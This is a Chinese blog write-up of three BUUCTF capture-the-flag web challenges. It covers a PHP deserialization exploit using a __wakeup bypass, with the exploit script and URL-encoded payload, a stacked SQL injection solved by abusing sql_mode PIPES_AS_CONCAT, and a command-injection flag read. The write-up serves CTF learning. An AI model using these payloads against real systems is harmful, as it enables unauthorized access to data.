BUUCTF刷题[PHP]&[EasySQL]&[Exec]

最新推荐文章于 2024-05-28 14:55:00 发布
最新推荐文章于 2024-05-28 14:55:00 发布
阅读量546 收藏
点赞数 1
分类专栏: WP 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/not_code_god/article/details/121881439
版权

BUUCTF

[极客大挑战 2019]PHP

image-20211211233303732

题目给出提示说因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!!,这就马上想到源码备份泄露的问题,一般网站的源码备份一般放在根目录的www.zip,当然还有各种后缀比如说.bak等等,先试下那常见的几个,如果都没找到那就没找到吧哈哈,当然你也可以用dirsearch工具扫描后台

常见的网站源码备份文件名

  • web
  • website
  • backup
  • back
  • www
  • wwwroot
  • temp

比如说index.php.bak

image-20211211233256013

然后将源码dowm下来之后就可以审计源码了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EipOaOV5-1639236802295)(C:/Users/86185/AppData/Roaming/Typora/typora-user-images/image-20211211225949381.png)]

可以看到有三个php文件,分别打开审计一下

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
      <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{   
        position: absolute;   
        top: 50%;   
        left:50%;   
        margin: -150px 0 0 -150px;   
        width: 300px;   
        height: 300px;   
    }   
    h4{   
        font-size: 2em;   
        margin: 0.67em 0;   
    }
</style>
<body>







<div id="world">
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
    </div>
    <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script  src="index.js"></script>
</body>
</html>

可以看到在index.php里面

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

存在一个反序列化漏洞,传入一个select参数,并将其进行一次反序列化,这里包含了class.php文件,所以直接在class.php进行审计

image-20211211233239886

这里只有一个Name类,里面有两个属性分别为username和password,然后我们进行反序列化的时候会自动触发wakeup和destruct方法,首先要找到将要执行的点,显然是destruct里面的那两条判断条件,当password的值不为100的时候die(),所以必须要让password的值为100,然后当usernamde的值为admin的时候,输出flag的值

所以构造出的exp

<?php
class Name{
    private $username = 'admin';
    private $password = '100';

}
$a=new Name();
echo urlencode(serialize($a));
?>

这里因为这两个属性都是private,所以直接打印出来的话就会存在不可见字符,复制的时候会复制不完整,所以我将它进行了一次URL编码,然后等上传到服务器的时候会自动进行一次URL解码

这里还要注意一个点就会要绕过wakeup这个魔术方法,因为他会将我们修改的username这个属性的值变为guest,而绕过这个wakeup方法的方法就是将这个反序列化数据中那个wakeup位于的类的所含属性个数修改为大于本来就有的个数

比如说这道题有两个属性,然后为了绕过它你就要将属性的个数修改为3及以上的值

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

=>

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

image-20211211233228910

然后构造出payload如下

?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

image-20211211233207172

[SUCTF 2019]EasySQL

image-20211212001632976
传入参数判断是否有注入点

image-20211211202800760
image-20211212001701464
发现只有传入非0数字才会有回显,且回显为1,当传入1=2的时候回显0,而且大部分的命令都被禁用了,比如说and or

image-20211211234902348

综合以上的过滤信息看的话基本上就是什么报错,时间盲注都不能进行了

所以我们尝试一下其他的骚操作,比如说堆叠注入

1;show databases;

1;use ctf;

image-20211212001747476
!image-20211212001806437
发现这个flag就在CTF那个数据库里面,但是当执行show columns from flag的时候发现回显了nonono,这是因为过滤了from 和 flag这个,所以只能换一种思路了,根据官方的WP就是根据现在已有的条件对这个后端的源代码进行猜测

通过输入非0数字回显为1,其他的0或者字母不回显判断出可能存在||管道符

然后通过堆叠注入判断出它查询的那个表就是flag

select post[‘query’] ||flag from Flag;

然后接下来就有两种解法

  • *,1

相当于select *,1||flag from Flag

也就是将flag表中的所有内容打印出来

  • query=2;set sql_mode=PIPES_AS_CONCAT;select 2

    这里就是修改了一下sql_mode的值,也就是让||这个管道符的作用编程字符串连接的作用,类似于concat

    具体的sql_mode的那些值有哪些以及他们各自的作用可以自行搜索

image-20211212001458868

image-20211212001524478总之这道题的难点就是要你去猜他的后端源码

[ACTF2020 新生赛]Exec

image-20211211233421090

一道rce的题,尝试一下ls

image-20211211233523182

发现有回显,且flag就在文件根目录下,然后看下能不能直接通过cat命令输出出来

image-20211211233721794

很显然可以

Pysnow
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[极客大挑战 2019]web部分解(已完结!),网络安全开发面试基础
m0_60635224的博客
04-08 984
那直接打指令找一下吧:cat /flag和的这里我会讲解我理解下的内容,如果有兴趣的师傅建议去原文看一下,其中我真的很喜欢士别三日博客的一句话,真的建议每一位Ctfer记住!
php exec ctf,从一道CTF目谈PHP中的命令执行
weixin_42365490的博客
03-17 875
answer = "phpinfo"tmp1,tmp2 = '', ''forc inanswer:fori invalid:forj invalid:if(ord(i)^ord(j) == ord(c)):tmp1 += itmp2 += jbreakelse:continuebreakprint(tmp1,tmp2)其中valid是可用的字符,answer是我们需要构造的字符串。那么我们得到了...
浅谈PHPexec()函数无返回值排查方法(必看)
10-20
下面小编就为大家带来一篇浅谈PHPexec()函数无返回值排查方法(必看)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
攻防_漏洞_命令执行_php命令执行
redglare的博客
10-21 569
php 命令执行
Buuctf-Web-[极客大挑战 2019]EasySQL 1 解及思路总结(1)
m0_60452293的博客
04-08 639
SQL注入。
[极客大挑战 2019]PHP 1
feng的博客
10-20 663
前言 审thinkphp审吐了。。。根本看不懂代码。。。各种函数跳。。。感觉自己的头发都掉了很多。。。来打打BUUCTF目来放松一下。。 考察的知识点 备份文件 反序列化 代码审计 和猫玩 WP 首先进去环境,看到 因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!! 很明显提示存在备份文件。试了几个常见的swp、~、bak等,发现还是没出,以为是git泄露之类的。但是因为BUUCTF限制了访问,用dirsearc扫的话会429,自己控制参数来放慢扫描速率的话扫的太慢了。。。
[极客大挑战 2024]web部分解(已完结!),2024年最新学习指南
2401_84185471的博客
04-10 448
while low
php exec ctf,[CTF_web]exec/exec2.php
weixin_42499201的博客
03-17 304
CTF_web源码如下 :$ip = isset($_GET['ip'])?$_GET['ip']:die();if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){die("ip 格式错误!");}echo strlen($ip);if(strlen($ip)&lt;7||strlen($ip)&gt;21){die("ip ...
php exec ctf,[CTF_web]exec/exec1.php
weixin_35524300的博客
03-17 578
CTF_web源码如下 :// Get input$target = $_REQUEST[ 'ip' ];// var_dump($target);$target=trim($target);// var_dump($target);// Set blacklist$substitutions = array('&amp;' =&gt; '',';' =&gt; '','|' =&gt; '',...
[原复现]百度杯CTF比赛 十月场 WEB EXEC(PHP弱类型)
笑花大王
03-12 662
简介 原复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
php使用PDO下exec()函数查询执行后受影响行数的方法
01-21
本文实例讲述了php使用PDO下exec()函数查询执行后受影响行数的方法。分享给大家供大家参考,具体如下: exec()方法返回执行后受影响的行数。 语法:int PDO::exec(string statement) 提示:...
PHP中如何判断exec函数执行成功?
10-21
PHP日常开发中有时候会要判断exec函数是否执行成功了呢?那如何判断呢?下面跟着小编一起通过本文来学习学习。
[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 1825
[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂
buuctf [极客大挑战 2019]PHP
qq_1873822的博客
03-13 678
打开是一个充满色彩的猫猫页面 因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!! 应该网站有备份,/www.zip 解&lt;?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$pas
BUUCTF:[极客大挑战 2019]PHP
末初的CSDN博客
10-20 941
目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP 根据提示找到www.zip进行下载 //index.php &lt;!DOCTYPE html&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;I have a cat!&lt;/title&gt; &lt;link rel="styles.
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 326
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
Steamdeck使用Windows系统游玩雪地奔驰时闪退问解决方法
最新发布
fxalll的博客
05-28 377
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问。困扰我两天的问终于解决了,也算这个小众游戏全网的第一个解决方案吧。
HackTheBox-Machines--Popcorn
七天
05-28 477
Popcorn 测试过程。
智能的PHP开发工具PhpStorm v2024.1全新发布——支持PHPUnit 11.0
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
05-24 666
PhpStorm 发布了今年第一个重大更新v2024.1,此版本支持PHPUnit 11.0、使用本地AI进行全行代码补全,欢迎下载最新版体验!
buuctf exec 1
09-26
buuctf exec 1是一种利用PHPexec函数进行远程命令执行(RCE)的方法。通过构造合适的命令字符串,可以将需要执行的命令传递给exec函数,从而实现命令的执行。 在给定的引用中,有一些有关命令执行的常用操作符被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pysnow

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值